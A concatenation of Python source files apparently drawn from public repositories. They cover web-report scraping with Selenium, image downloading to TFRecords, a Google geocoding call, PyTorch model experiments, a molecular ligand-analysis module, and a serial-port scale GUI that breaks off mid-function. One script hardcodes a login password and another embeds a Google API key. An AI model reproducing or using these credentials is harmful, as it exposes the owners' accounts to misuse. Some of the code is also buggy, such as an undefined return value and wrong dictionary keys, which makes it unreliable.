table:nth-child(2) > tbody > tr:nth-child(5) > td.tabcol > input:nth-child(1)'\ntime.sleep(5)\ndriver.find_element_by_css_selector(txt_usuario).send_keys('DIST_METROP')\ndriver.find_element_by_css_selector(txt_contraseña).send_keys('METRO#2022')\ndriver.find_element_by_css_selector(btn_entrar_sistema).click()\n\ntime.sleep(10)\n\n ############################################################\na= driver.find_elements_by_tag_name('frame')\ndriver.switch_to.frame(a[0])\n ############################################################\n\ndriver.find_element_by_link_text('Channel reports-C2S').click()\ntime.sleep(8)\n ### seleccionar jerarquia\n\nelement = driver.find_element_by_name(\"serviceType\")\ntime.sleep(8)\n\nwebElem=driver.find_element_by_xpath(\"//*[(@value = 'ALL')]\")\nwebElem.click()\ntime.sleep(8)\n\nselect=driver.find_element_by_name(\"transferStatus\")\nselect.click()\ntime.sleep(8)\n\nwebElem=driver.find_element_by_xpath(\"//*[(@value = '200')]\")\nwebElem.click()\ntime.sleep(8)\n\nfechainicio=driver.find_element_by_name(\"currentDate\")\n\nfecha_a=datetime.strftime((datetime.today()),'%d/%m/%y')\n \nfechainicio.send_keys(fecha_a)\n\ntime.sleep(9)\n\nhora_inicial=\"00:00\"\nhora_final=\"23:59\"\n\nfechafin=driver.find_element_by_name(\"fromTime\")\nfechafin.send_keys(hora_inicial)\ntime.sleep(8)\n\n\nfechafin=driver.find_element_by_name(\"toTime\")\nfechafin.send_keys(hora_final)\ntime.sleep(8)\n\nbtnE=driver.find_element_by_name(\"submitButton\")\nbtnE.click()\ntime.sleep(30)\n #get current window handle\np = driver.current_window_handle\n\n #get first child window#get first child window\nchwd = driver.window_handles\ndriver.switch_to.window(chwd[1])\ndriver.maximize_window()\nprint(\"Child window title: \" + driver.title)\n\ntime.sleep(15)\n\nsaverpt=driver.find_element_by_id(\"save\")\nsaverpt.click()\ntime.sleep(8)\n\nsaverpt =driver.find_element_by_xpath(\"//*[@id='__menuBar']/div[6]/ul/li[1]/div\")\nsaverpt.click()\ntime.sleep(8)\n\nsaverpt =driver.find_element_by_xpath(\"//*[@id='__menuBar']/div[6]/ul/li[1]/div/ul/li[4]\")\nsaverpt.click()\ntime.sleep(8)\n\nsaverpt =driver.find_element_by_id(\"ok\")\nsaverpt.click()\n\ntime.sleep(4)\n\ndriver.quit()\n\n\n\n##MODELADO DE LA DATA\n##########################################################################\n# #\\\\192.168.0.85\\Users\\50576\\Desktop\\python\np_open=pd.read_excel(r'C:\\Users\\50576\\Downloads\\c2sTransferChannelUserNew.xlsx')\n\np_open_=pd.DataFrame(p_open)\np_open_=p_open_.drop([0,1,2,3,4,5,6,7,8,9,10,11,12])\np_open_=p_open_.drop(['Unnamed: 0', 'Unnamed: 1', 'Unnamed: 3','Unnamed: 9','Unnamed: 17','Unnamed: 18'], axis=1)\np_open_= p_open_.dropna(axis=0, subset=['Unnamed: 2'])\np_open_.rename(columns={'Unnamed: 2':\"transferencia\",\n'Unnamed: 4':\"tipo\",\n'Unnamed: 5':\"cliente\",\n'Unnamed: 6':\"pos\",\n'Unnamed: 7':\"service\",\n'Unnamed: 8':\"pos_final\",\n'Unnamed: 13':\"monto\"\n},inplace=True)\np_open_.reset_index(inplace=True,drop=True) \n\np_open_=pd.DataFrame(p_open_[\n [\"transferencia\",\n \"tipo\",\n \"cliente\",\n \"pos\", \n \"service\",\n \"pos_final\",\n \"monto\"]])\n\np_open_['fecha'] = p_open_['transferencia'].str.slice(1, 7)\n\np_open_.to_excel(r'C:\\Users\\50576\\Documents\\TAE\\Activacion\\%s' %fecha,engine='xlsxwriter',\nindex=False,sheet_name='Pagos Open')\n\nshutil.move(r'C:\\Users\\50576\\Downloads\\c2sTransferChannelUserNew.xlsx', r'C:\\Users\\50576\\AppData\\Local\\Temp\\data.xlsx')","sub_path":"NIC_EXTRAE_ACTIVACION_METROPOLITANA_CORTES.py","file_name":"NIC_EXTRAE_ACTIVACION_METROPOLITANA_CORTES.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"242136976","text":"import json\nimport os\n\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\nimport configparser\nimport tensorflow as tf\n\nconfig = configparser.ConfigParser()\nconfig.read(\"tfconfig.ini\")\nsave_img_folder = config['Folders']['save_img_folder']\nimg_json = config['Train']['img_json']\n\nwith open(img_json, 'r') as fp:\n json_input = json.load(fp)\n\nimage2label = dict()\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef save_tfrecord(filename, image_raw, rows, cols, depth, format, url, label):\n '''\n :param filename: the file name to save as tfrecord file\n :param image_raw: the image data as string\n :return:\n '''\n with tf.python_io.TFRecordWriter(filename) as writer:\n example = tf.train.Example(\n features=tf.train.Features(\n feature={\n 'height': _int64_feature(rows),\n 'width': _int64_feature(cols),\n 'depth': _int64_feature(depth),\n 'label': _int64_feature(int(label)),\n 'format': _bytes_feature(tf.compat.as_bytes(format)),\n 'url': _bytes_feature(tf.compat.as_bytes(url)),\n 'image_raw': _bytes_feature(image_raw)\n }))\n writer.write(example.SerializeToString())\n\n\ndef save_url(url, image_id, errors_cc):\n _, ext = os.path.splitext(url[0])\n label = image2label[image_id]\n fname = 'label_' + str(image2label[image_id]) + '_' + str(image_id).zfill(10) + ext\n fname = os.path.join(save_img_folder, fname)\n tffname = 'label_' + str(image2label[image_id]) + '_' + str(image_id).zfill(10) + '.tfrecords'\n tffname = os.path.join(save_img_folder, tffname)\n if os.path.isfile(fname):\n print('skip file:', image_id)\n return errors_cc\n\n try:\n response = requests.get(url[0])\n image_raw = BytesIO(response.content)\n img = Image.open(image_raw)\n if img.width > 0 and img.height > 0:\n # print(fname, image_id, url)\n # img.show()\n img.save(fname)\n save_tfrecord(tffname, image_raw.getvalue(), img.width, img.height, img.layers, img.format, url[0], label)\n except:\n errors_cc += 1\n print(errors_cc, 'error in: ', url)\n\n return errors_cc\n\n\nif __name__ == '__main__':\n\n for v in json_input['annotations']:\n image_id = v['image_id']\n label_id = v['label_id']\n image2label[image_id] = label_id\n # print(image_id,label_id)\n\n errors_cc = 0\n for v in json_input['images']:\n url = v['url']\n image_id = v['image_id']\n errors_cc = save_url(url, image_id, errors_cc)\n","sub_path":"loadfromjasonandsave.py","file_name":"loadfromjasonandsave.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"423001342","text":"#geocodedata\nimport requests\n\nrequest=requests.get(\"https://maps.googleapis.com/maps/api/geocode/json?address=Soho,+LondonA&key=AIzaSyC-SokDY6x6E0Qj7tjyLembaj5MdOLJjYE\") \n\ngeo_location = request.json()\n\n\nlocation = geo_location['results'][0]['geometry']['location']\n\nlonglat = geo_location['lat'], geo_location['lng']\n","sub_path":"googlemaps.py","file_name":"googlemaps.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"278580139","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 23 12:55:40 2019\n\n@author: daniele\n\"\"\"\n#%%\nimport torch\nimport torch.nn as nn\nfrom torchvision import models\nfrom libraries.torchsummary import summary\nfrom libraries.model.options import Options, FullImagesOptions\nfrom libraries.model.network import FCN_Generator, EncoderTL, GeneratorTL\nfrom libraries.model.dataset import dataloaderPatchMasks\n\nfrom matplotlib import pyplot as plt\n#%%\nopt = Options()\nencTL = GeneratorTL(opt)\nencTL\n#%%\nsummary(encTL.cuda(), (3, 32, 32))\n\n#%%\nvgg = models.vgg16(pretrained=True).cuda()\nvgg\n#%%\nfor param in vgg.parameters():\n param.require_grad = False\n#%%\nsummary(vgg, (3,32,32))\n\n#%%\nmodules = list(vgg.children())[:-2]\nmodules.append(nn.Sequential(nn.Conv2d(512,100,(8,50))))\nmodules\n#%%\nmodules = list(vgg.children())[:-2][0]\nfeatures = list(modules)[:-3]\nencoder = nn.Sequential(*features)\nencoder.add_module('Final conv2D', nn.Conv2d(512, 1024, 2))\nencoder\n\n#%%\nencoder = nn.Sequential(*features)\nencoder\n#%%\nsummary(encoder.cuda(), (3,32,32))\n\n#%%\n\nencoder = nn.Sequential(*modules)\nencoder\n\n#%%\n\nsummary(encoder.cuda(), (3,256,1600))\n\n\n#%%\nk1, k2 = 3,3\n\ndecoder = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(512, 256, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(256, 128, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(128, 64, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(64, 32, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(32),\n nn.LeakyReLU(),\n \n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.ConvTranspose2d(32, 16, (k1,k2), stride=1, padding=1),\n nn.BatchNorm2d(16),\n nn.LeakyReLU(),\n\n \n# nn.ConvTranspose2d(32, 3, (2,2), stride=2),\n## nn.Tanh(),\n nn.Conv2d(16, 1, 1),\n nn.Sigmoid()\n \n )\n#%%\n\nsummary(decoder.cuda(), (512,8,50))\nk1, k2 = 4, 25\n\ndecoder = nn.Sequential(\n nn.ConvTranspose2d(100, 1024, (k1,k2)),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(1024, 512, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(512, 256, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(256, 128, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(128, 64, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(64, 32, (k1,k1), stride=2, padding=1),\n nn.BatchNorm2d(32),\n nn.LeakyReLU(),\n \n nn.ConvTranspose2d(32, 3, (2,2), stride=2),\n# nn.Tanh(),\n# nn.Conv2d(3, 1, (256,1600)),\n nn.Tanh()\n \n )\n\nsummary(decoder.cuda(), (100,1,1))\n#%%\nmodules = list(decoder.children())[:-1]\nmodules\na = nn.Sequential(*modules)\n\n#%%\n\nencoder = nn.Sequential(\n nn.Conv2d(3, 32, 4, stride=2),\n nn.LeakyReLU(),\n \n nn.Conv2d(32, 64, 4, stride=2),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n \n nn.Conv2d(64, 128, 4, stride=2),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n \n nn.Conv2d(128, 256, 4, stride=2),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n \n nn.Conv2d(256, 512, 4, stride=2),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n \n nn.Conv2d(512, 100, (6,48)),\n# nn.BatchNorm2d(1024),\n# nn.LeakyReLU(),\n \n# nn.Conv2d(1024, 1024)\n \n )\n\n\nsummary(encoder.cuda(), (3,256,1600))\n#%%\nopt = Options()\ndec = Decoder(opt)\ndec\n\nsummary(dec.cuda(), (100,1,1))\n\n#%%\nmodel = FCN_Generator().cuda()\nmodel.encoder1\nmodel.encoder2\nmodel.decoder\nmodel.finalLayer\nmodel.fullyConvLayer\n#%%\n\nfullOpt = FullImagesOptions(start=0, end=100, batch_size=16)\ndataloader = dataloaderPatchMasks(fullOpt)\n\n#%%\ni = 0\n\nimage = dataloader['test'].dataset.data[i]\nplt.imshow(image)\nplt.show()\n\nlabel = dataloader['test'].dataset.targets[i]\nplt.imshow(label)\nplt.show()\n\n#%%\nfrom torchvision import models\n\nr18 = models.resnet18(pretrained=True)\n\n\n","sub_path":"v2/transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"176250093","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nimport math\n\n\ndef calculate_hypotenuse(sideAB, sideBC):\n sidehypo = sideAB ** 2 + sideBC ** 2\n return math.sqrt(sidehypo)\n\n\ndef find_all_angles(sideBC, MC, MB):\n anlge_btw_MC_BC = (sideBC ** 2 + MC ** 2 - MB ** 2) / (2 * sideBC * MC)\n anlge_btw_MC_BC = math.degrees(math.acos(anlge_btw_MC_BC))\n print(str(round(anlge_btw_MC_BC)) + '\\u00b0')\n\n\ntry:\n # lines = []\n # while True:\n # line = input()\n # if line:\n # lines.append(line)\n # else:\n # break\n # # print(lines)\n # sideAB, sideBC = lines\n sideAB = input()\n sideBC = input()\n MB = calculate_hypotenuse(int(sideAB), int(sideBC)) / 2\n MC = MB\n # print(MB, MC)\n find_all_angles(int(sideBC), MC, MB)\nexcept Exception as e:\n print(e)\n","sub_path":"python_test.py","file_name":"python_test.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101634814","text":"## @file ligand.py\n# Defines ligand class for postprocessing DFT results by measuring ligand properties\n# \n# Written by JP Janet for HJK Group\n# \n# Dpt of Chemical Engineering, MIT\n\nfrom molSimplify.Classes.mol3D import *\nfrom molSimplify.Classes.atom3D import *\nfrom molSimplify.Scripts.geometry import *\nfrom collections import Counter\n\n\n## Ligand class for postprocessing DFT results by measuring ligand properties\nclass ligand:\n ## Constructor\n # @param self The object pointer\n # @param master_mol A mol3D complex to extract ligand from\n # @param index_list A list of indices of the ligand atoms\n # @paran dent The denticity of the ligand\n def __init__(self, master_mol, index_list, dent):\n self.master_mol = master_mol\n self.index_list = index_list\n self.dent = dent\n self.ext_int_dict = dict() ## store\n\n ## map betweem\n ## int and ext indcies\n ## Obtain the ligand from the complex mol3D object\n # @param self The object pointer\n def obtain_mol3d(self):\n this_mol = mol3D()\n this_ext_int_dict = dict()\n j = 0\n for i in range(0, self.master_mol.natoms):\n if i in self.index_list:\n this_mol.addAtom(self.master_mol.getAtom(i))\n this_ext_int_dict.update({i: j})\n j += 1 # keep count of how many are added\n self.mol = this_mol\n self.ext_int_dict = this_ext_int_dict\n\n ## Truncate ligand about connecting atoms\n # @param self The object pointer\n # @param con_atoms The connection atom indices\n # @param hops Number of bonds to truncate after\n # @return Truncated mol3D object\n def obtain_truncation(self, con_atoms, hops):\n self.trunc_mol = mol3D()\n added_list = list()\n for connections in con_atoms:\n hopped = 0\n active_set = [connections]\n while hopped < hops:\n hopped += 1\n new_active_set = list()\n for this_atom in active_set:\n this_atoms_neighbors = self.master_mol.getBondedAtoms(this_atom)\n for bound_atoms in this_atoms_neighbors:\n if (bound_atoms in self.index_list) and (bound_atoms not in added_list):\n self.trunc_mol.addAtom(self.master_mol.getAtom(bound_atoms))\n added_list.append(bound_atoms)\n [new_active_set.append(element) for element in this_atoms_neighbors]\n active_set = new_active_set\n return trunc_mol\n\n\n## Extract axial and equitorial components of a octahedral complex\n# @param mol The mol3D object for the complex\n# @param liglist List of ligands\n# @return ligdents List of ligand dents\n# @return ligcons List of ligand connection indices (in mol)\n\n\ndef ligand_breakdown(mol, flag_loose=False):\n # this function takes an octahedral\n # complex and returns ligands\n metal_index = mol.findMetal()[0]\n bondedatoms = mol.getBondedAtomsOct(metal_index, CN=6, debug=False, flag_loose=flag_loose)\n print('!!!!flagloose', flag_loose)\n # bondedatoms = mol.getBondedAtomsSmart(metal_index)\n print('!!!!!boundatoms', bondedatoms)\n #\tprint('from get oct' + str(bondedatoms))\n #\tprint('***\\n')\n bonded_atom_symbols = [mol.getAtom(i).symbol() for i in bondedatoms]\n counter = 0\n liglist = []\n ligdents = []\n ligcons = []\n for atom in bondedatoms:\n # print('this atom type is ' + mol.getAtom(atom).symbol())\n # print('conection number ' + str(atom) + \" of \" + str(bondedatoms))\n fragment = mol.findsubMol(atom, metal_index)\n this_cons = [x for x in fragment if (x in bondedatoms)]\n unique = True\n for i, unique_ligands in enumerate(liglist):\n if fragment == unique_ligands:\n unique = False\n matched = i\n if unique:\n liglist.append(fragment)\n ligdents.append(1)\n ligcons.append(this_cons)\n else:\n ligdents[matched] += 1\n return liglist, ligdents, ligcons\n\n\ndef ligand_assign(mol, liglist, ligdents, ligcons, loud=False, name=False):\n valid = True\n loud = False\n metal_index = mol.findMetal()[0]\n built_ligand_list = list()\n lig_natoms_list = list()\n unique_ligands = list()\n ligand_counts = list()\n all_ligand_counts = [0, 0, 0, 0, 0, 0]\n ligand_records = list()\n ax_con_int_list = list()\n eq_con_int_list = list()\n ax_natoms_list = list()\n eq_natoms_list = list()\n n_ligs = len(liglist)\n max_dent = max(ligdents)\n min_dent = min(ligdents)\n if loud:\n print('********************************************')\n print(\"n_ligs = \" + str(n_ligs))\n print(\"max d = \" + str(max_dent))\n print(\"min_dent = \" + str(min_dent))\n print(\"ligand list is\" + str(liglist))\n print('denticities are ' + str(ligdents))\n if (max(ligdents) == 4) and (min(ligdents) != 1):\n valid = False\n print('bad denticities: ' + str(ligdents))\n print('min denticities: ' + str(min(ligdents)))\n if max(ligdents) > 4:\n valid = False\n print('bad denticities: ' + str(ligdents))\n print('max denticities: ' + str(min(ligdents)))\n if n_ligs > 3 and min(ligdents) > 1:\n valid = False\n print('too many ligs ' + str((n_ligs)))\n eq_lig_list = list()\n ax_lig_list = list()\n ax_con_list = list()\n eq_con_list = list()\n for i, ligand_indices in enumerate(liglist):\n this_ligand = ligand(mol, ligand_indices, ligdents[i])\n this_ligand.obtain_mol3d()\n built_ligand_list.append(this_ligand)\n lig_natoms_list.append(this_ligand.mol.natoms)\n for j, built_ligs in enumerate(built_ligand_list):\n ### test if ligand is unique\n sl = [atom.symbol() for atom in built_ligs.mol.getAtoms()]\n if loud:\n print('checking lig ' + str(j) + ' : ' + str(sl))\n unique = 1\n for i, other_sl in enumerate(unique_ligands):\n if sorted(sl) == sorted(other_sl):\n # duplicate\n unique = 0\n ligand_counts[i] += 1\n if unique == 1:\n unique_ligands.append(sl)\n ligand_counts.append(1)\n ligand_records.append(j)\n ### loop to bin ligands:\n for j, built_ligs in enumerate(built_ligand_list):\n ### test if ligand is unique\n sl = [atom.symbol() for atom in built_ligs.mol.getAtoms()]\n unique = 1\n for i, other_sl in enumerate(unique_ligands):\n if sorted(sl) == sorted(other_sl):\n # duplicate\n # print(i,ligand_counts[i])\n all_ligand_counts[j] = ligand_counts[i]\n\n if loud:\n print('unique ligands' + str(unique_ligands))\n print('ligand counts' + str(ligand_counts))\n print('ligand records ' + str(ligand_records))\n print(str(max(ligand_counts)) + ' is the max and min in ' + str(min(ligand_counts)))\n n_unique_ligs = len(unique_ligands)\n if (n_ligs == 3) or (n_ligs == 4): # most common case,\n # one/two equitorial and 2 axial mono\n # or three bidentate\n for i, ligs in enumerate(liglist):\n if ligdents[i] == 1 and min_dent == 1: ## anything with equitorial monos will\n ## have higher than 4 n_ligs\n ax_lig_list.append(i)\n if loud:\n print('choosing ' + str(i) + ' as ax based on dent =1')\n ax_con_list.append(ligcons[i])\n if (ligdents[i] >= 2) and (min_dent == 1):\n eq_lig_list.append(i)\n if loud:\n print('choosing lig ' + str(i) + ' as eq based on high dent')\n eq_con_list.append(ligcons[i])\n if (n_ligs == 3) and (min_dent == max_dent):\n if n_unique_ligs == 1:\n # take any 2, they are all the same\n if loud:\n print('triple bidentate case')\n ax_lig_list.append(0)\n eq_lig_list.append(1)\n eq_lig_list.append(2)\n ax_con_list.append(ligcons[0])\n eq_con_list.append(ligcons[1])\n eq_con_list.append(ligcons[2])\n elif min_dent == 2 and max_dent == 2 and n_ligs == 3 and not n_unique_ligs == 1:\n ## this is a hetero/bidentate case\n for i, ligs in enumerate(liglist):\n if all_ligand_counts[i] == 2:\n eq_lig_list.append(i)\n eq_con_list.append(ligcons[i])\n elif all_ligand_counts[i] == 1:\n ax_lig_list.append(i)\n ax_con_list.append(ligcons[i])\n elif (n_ligs == 6): # all mono case,\n minz = 500\n maxz = -500\n if loud:\n print('monodentate case')\n allowed = range(0, 6)\n not_eq = list()\n for j, built_ligs in enumerate(built_ligand_list):\n this_z = built_ligs.mol.centermass()[2]\n if this_z < minz:\n minz = this_z\n bot_lig = j\n bot_con = ligcons[j]\n if loud:\n print('updating bot axial to ' + str(bot_lig))\n if this_z > maxz:\n maxz = this_z\n top_lig = j\n top_con = ligcons[j]\n if loud:\n print('updating top axial to ' + str(top_lig))\n not_eq.append(bot_lig)\n not_eq.append(top_lig)\n\n allowed = [x for x in allowed if ((x not in not_eq))]\n if len(allowed) != 4:\n print('error in decomp of monodentate case!', allowed)\n eq_lig_list = allowed\n eq_con_list = [ligcons[i] for i in allowed]\n ax_lig_list = [top_lig, bot_lig]\n ax_con_list = [top_con, bot_con]\n if loud:\n print('geometric eq_list ' + str(eq_lig_list))\n print('geometric ax_list ' + str(eq_lig_list))\n if (max(ligand_counts) != 4) or (min(ligand_counts) != 2):\n if loud:\n print('not a 4-6 case')\n if (max(ligand_counts) == 6):\n if loud:\n print('6-homoleptic, using geo values')\n # ax=ligand_records[ligand_counts.index(6)]\n # eq_lig=ligand_records[ligand_counts.index(6)]\n else:\n if loud:\n print('monodentates not the same, using geo values ')\n print(ligand_counts)\n print(unique_ligands)\n elif n_unique_ligs == 2:\n if loud:\n print('this is a 4-6 case')\n allowed = range(0, 6)\n ax_lig_list = [i for i in allowed if (all_ligand_counts[i] == 2)]\n eq_lig_list = [i for i in allowed if (all_ligand_counts[i] == 4)]\n ax_con_list = [ligcons[i] for i in ax_lig_list]\n eq_con_list = [ligcons[i] for i in eq_lig_list]\n # ax_lig=ligand_records[ligand_counts.index(2)]\n # eq_lig=ligand_records[ligand_counts.index(4)]\n ax_ligand_list = [built_ligand_list[i] for i in ax_lig_list]\n eq_ligand_list = [built_ligand_list[i] for i in eq_lig_list]\n if loud and valid:\n print('lig_nat_list', lig_natoms_list)\n print('eq_liq is ind ', eq_lig_list)\n print('ax_liq is ind ', ax_lig_list)\n print('ax built lig [0] ext ind :' + str(built_ligand_list[ax_lig_list[0]].ext_int_dict.keys()))\n if len(ax_lig_list) > 1:\n print('ax built lig [1] ext ind :' + str(built_ligand_list[ax_lig_list[1]].ext_int_dict.keys()))\n print('eq built lig [0] ext ind: ' + str(built_ligand_list[eq_lig_list[0]].ext_int_dict.keys()))\n print('eq_con is ' + str((eq_con_list)))\n print('ax_con is ' + str((ax_con_list)))\n if name:\n for i, ax_ligand in enumerate(ax_ligand_list):\n if not os.path.isdir('ligands'):\n os.mkdir('ligands')\n ax_ligand.mol.writexyz('ligands/' + name + '_' + str(i) + '_ax.xyz')\n for i, eq_ligand in enumerate(eq_ligand_list):\n if not os.path.isdir('ligands'):\n os.mkdir('ligands')\n eq_ligand.mol.writexyz('ligands/' + name + '_' + str(i) + '_eq.xyz')\n for j, ax_con in enumerate(ax_con_list):\n ax_con_int_list.append(\n [built_ligand_list[ax_lig_list[j]].ext_int_dict[i] for i in ax_con]) # convert to interal index\n for j, eq_con in enumerate(eq_con_list):\n eq_con_int_list.append(\n [built_ligand_list[eq_lig_list[j]].ext_int_dict[i] for i in eq_con]) # convert to interal index\n if loud:\n print('int eq ' + str(eq_con_int_list))\n print('ext eq ' + str(eq_con_list))\n print('**********************************************')\n for ax_lig in ax_lig_list:\n ax_natoms_list.append(lig_natoms_list[ax_lig])\n for eq_lig in eq_lig_list:\n eq_natoms_list.append(lig_natoms_list[eq_lig])\n return ax_ligand_list, eq_ligand_list, ax_natoms_list, eq_natoms_list, ax_con_int_list, eq_con_int_list, ax_con_list, eq_con_list, built_ligand_list\n","sub_path":"molSimplify/Classes/ligand.py","file_name":"ligand.py","file_ext":"py","file_size_in_byte":13163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"192549748","text":"import os\nimport sys\nimport random\nimport serial\nimport time\nimport requests\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\n\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\n\nglobal new_mass,separated_mass,tare_part\nglobal id_wagi_na_serwerze\n\ntry:\n lista_argumentow = sys.argv[1].split(\"|\") \nexcept:\n try: \n print(\"Ciąg znaków:\")\n print(sys.argv[1])\n if(sys.argv[1]=='-?' or sys.argv[1]=='-help' or sys.argv[1]=='-h'):\n print('Welcome to help file')\n print('by git: MarcinanBabarzynca.')\n print('Algoritm:')\n print('1. Get string of arguments (example): '+ \"['Waga lewa piecowa|COM6|COM14|0|0']\")\n print('2. Split string \"|\" ')\n print('3. Start serial comunicator for Waga and ask question to Waga')\n print('4. If response is incorrect display message that there is other response or no response at all')\n print('5. Start another serial comunicator for external controller and ask question for name')\n print('6. If response is incorrect display message that there is other response or no response at all')\n print('7. If both succeed --> Start gui, set name')\n if('^' in sys.argv[1]):\n window_title = sys.argv[1].split('^')\n window_title = window_title[0]\n print('Name of Waga: \"'+window_title+'\"')\n else:\n print('Błędne argumenty podane podczas startu programu wpisz -h aby otrzymać pomoc')\n\n if('SCALE_ID#' in sys.argv[1]):\n scale_id = sys.argv[1].split('SCALE_ID#')\n scale_id = scale_id[1].split('&')\n scale_id=scale_id[0]\n print('Identyfikator wagi: \"'+scale_id+ '\"')\n else:\n print('Błędne argumenty podane podczas startu programu wpisz -h aby otrzymać pomoc')\n\n if('PILOT_ID#' in sys.argv[1]):\n pilot_id = sys.argv[1].split('PILOT_ID#')\n pilot_id = pilot_id[1].split('|')\n pilot_id = pilot_id[0]\n print('Identyfikator pilota użytego do tego urządzenia: \"'+pilot_id+ '\"')\n except:\n print('Błędne argumenty podane podczas startu programu wpisz -h aby otrzymać pomoc')\n exit()\n\n \n\n\n\n\nwindow_title=lista_argumentow[0]\n\n#uchwyt pilota\n#tu jest fajne ustawienie timeoutu. W sekundach... czyli po jednej sekundzie zwróci wartość lub 0 jeżeli się nie uda odebrać danych.\n#można ustawić na 0. to wtedy otrzymamy ostatni bufor.\nscale = serial.Serial(\n port=lista_argumentow[1],\n baudrate=9600,\n timeout=0.5\n)\n\n#uchwyt pilota\npilot = serial.Serial(\n port=lista_argumentow[2],\n baudrate=9600,\n timeout=0.5\n)\n\n\nroot = tk.Tk()\nid_wagi_na_serwerze = IntVar(root,name=\"id_wagi_na_serwerze\",value=9)\nadres_serwera_i_skryptu = StringVar(root, name=\"adres_serwera_i_skryptu\", value=\"localhost/test/insert.php\")\n#?nazwa=9&dane=1213\nnew_mass = StringVar(root, name=\"new_mass\", value =\"Brak danych\")\nsended_mass = StringVar(root,name=\"sended_mass\",value = \"0\")\ntare_part = StringVar(root,name=\"tare_part\",value=\"0\")\np1 = PhotoImage(file = 'ikona_wag.png')\nroot.iconphoto(False, p1)\n#root.iconphoto(False, tk.PhotoImage(file='/path/to/ico/icon.png'))\n#root.iconbitmap('/ikona-wag.ico')\n\n\ndef update_mass():\n #tu będzie obsługa serial portu\n #new_mass = (str(random.randint(13123,1231313))+ \" g\")\n root.setvar(\"new_mass\",value = serial_read_line(scale))\n serial_clear_read_buffer(scale)\n pilot_message = serial_read_line(pilot)\n #(text=root.getvar(name=\"new_mass\"))\n if(tare_part.get()==\"1\"):\n serial_write(scale,\"C1\\r\\n\")\n tare_part.set(value=\"0\")\n stan_wagi.config(text=\"Wytarowano\")\n if(pilot_message ==(b't\\r\\n') or pilot_message ==('t')):\n print(\"Wysyłam tarowanie do wagi\")\n #tare_btnClickFunction()\n serial_write(scale,\"T\\r\\n\")\n tare_change_text()\n tare_part.set(value=\"1\")\n #masa.after(500, cd_of_tare)\n #serial_write(scale,\"C1\\r\\n\")\n if(pilot_message ==(b'w\\r\\n') or pilot_message ==('w')):\n print(\"Staram się wysłać wagę do serwera\")\n send_btnClickFunction()\n if(pilot_message ==(b'c\\r\\n') or pilot_message ==('c')):\n print(\"Wysyłam ujemną wagę do serwera\")\n minus_send_btnClickFunction()\n masa.config(text=root.getvar(name=\"new_mass\"))#root.getvar(name=\"new_mass\"))\n \n masa.after(500, update_mass)\n \n\ndef check_server_connection():\n r = requests.get('http://localhost/test/key.php?key=keykeykey')\n if(r.text == \"keykeykey\"):\n stan_wagi.config(text=\"SERWER OK\")\n else:\n stan_wagi.config(text=\"BRAK POŁĄCZENIA Z SERWEREM\")\n stan_wagi.after(30000, check_server_connection)\n\n\n######################################### Funkcje przycisków\n\n#Po kliknięciu wyslij\n#1. Wyswietl w konsoli info o tym że coś napisano\n#2. Wywietl mase ktora jest ostatnio odczytana i zapisana w zmiennej new_mass\ndef send_btnClickFunction():\n print(window_title+':send')\n print(new_mass.get())\n print(\"Rozpoczynam komunikacje z serwerem\")\n stan_wagi.config(text=\"Nadaje\")\n #response = requests.get('10.186.10.2/test/insert_dla_wag.php'+ \"?data=\"+str(new_mass))\n #wiadomosc = response.content\n #print(wiadomosc)\n #if(wiadomosc == \"zapisalem\"):\n # sended_mass = new_mass\n # return 1\n #else:\n # return 0\n\n\ndef tare_btnClickFunction():\n print(window_title+':tare')\n #serial_write(scale,\"C1\\r\\n\")\n serial_write(scale,\"T\\n\\r\")\n 